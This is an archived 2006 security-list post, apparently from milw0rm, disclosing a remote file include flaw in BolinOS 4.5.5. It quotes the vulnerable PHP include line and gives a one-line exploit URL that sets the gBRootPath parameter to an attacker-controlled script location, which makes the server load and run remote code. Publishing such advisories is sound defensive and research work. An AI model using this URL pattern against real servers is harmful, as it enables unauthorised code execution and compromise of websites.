BolinOS v.4.5.5 <= (gBRootPath) Remote File Include Vulnerability Sep 15 2006 01:56PM
x0r0n hotmail com
=-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-=
=-==-=

+

+BolinOS v.4.5.5 <= (gBRootPath) Remote File Include Vulnerability

+

=-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-=
=-==-=

+

+Author: xoron (turkish hacker)

+

=-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-=
=-==-=

+

+Class : Remote

+

=-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-=
=-==-=

+

+Vuln Code: include ($GLOBALS["gBRootPath"].$GLOBALS["gBSysPath"]."/system/_b/contentFiles/g
BLib.php");

+

=-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-=
=-==-=

+

+Exploit: http://www.site.com/[script path]/system/_b/contentFiles/gBIndex.php?gBRootPath=evil_scripts?

+

=-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-=
=-==-=

+ Thanx : str0ke, Ironfist, Preddy, SHiKaA, mdx, gültekin, R3D4C!D, DaRK, insomnia, mirim, Dreamlord,

=-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-=
=-==-=

# milw0rm.com [2006-09-15]

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus